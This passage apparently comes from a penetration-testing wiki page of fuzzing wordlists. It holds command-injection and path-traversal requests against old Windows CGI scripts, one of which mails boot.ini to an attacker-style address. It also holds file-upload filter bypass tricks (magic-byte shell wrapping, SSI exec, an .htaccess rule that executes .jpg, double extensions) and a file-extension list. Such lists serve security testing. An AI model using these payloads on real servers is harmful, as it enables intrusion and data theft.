ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
# PHP on Windows&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 10 April 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{PREFIX}/templates_compiled/&lt;br /&gt;
{PREFIX}/templates_c/&lt;br /&gt;
{PREFIX}/templates/&lt;br /&gt;
{PREFIX}/temporary/&lt;br /&gt;
{PREFIX}/images/&lt;br /&gt;
{PREFIX}/cache/&lt;br /&gt;
{PREFIX}/temp/&lt;br /&gt;
{PREFIX}/files/&lt;br /&gt;
{PREFIX}/tmp/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
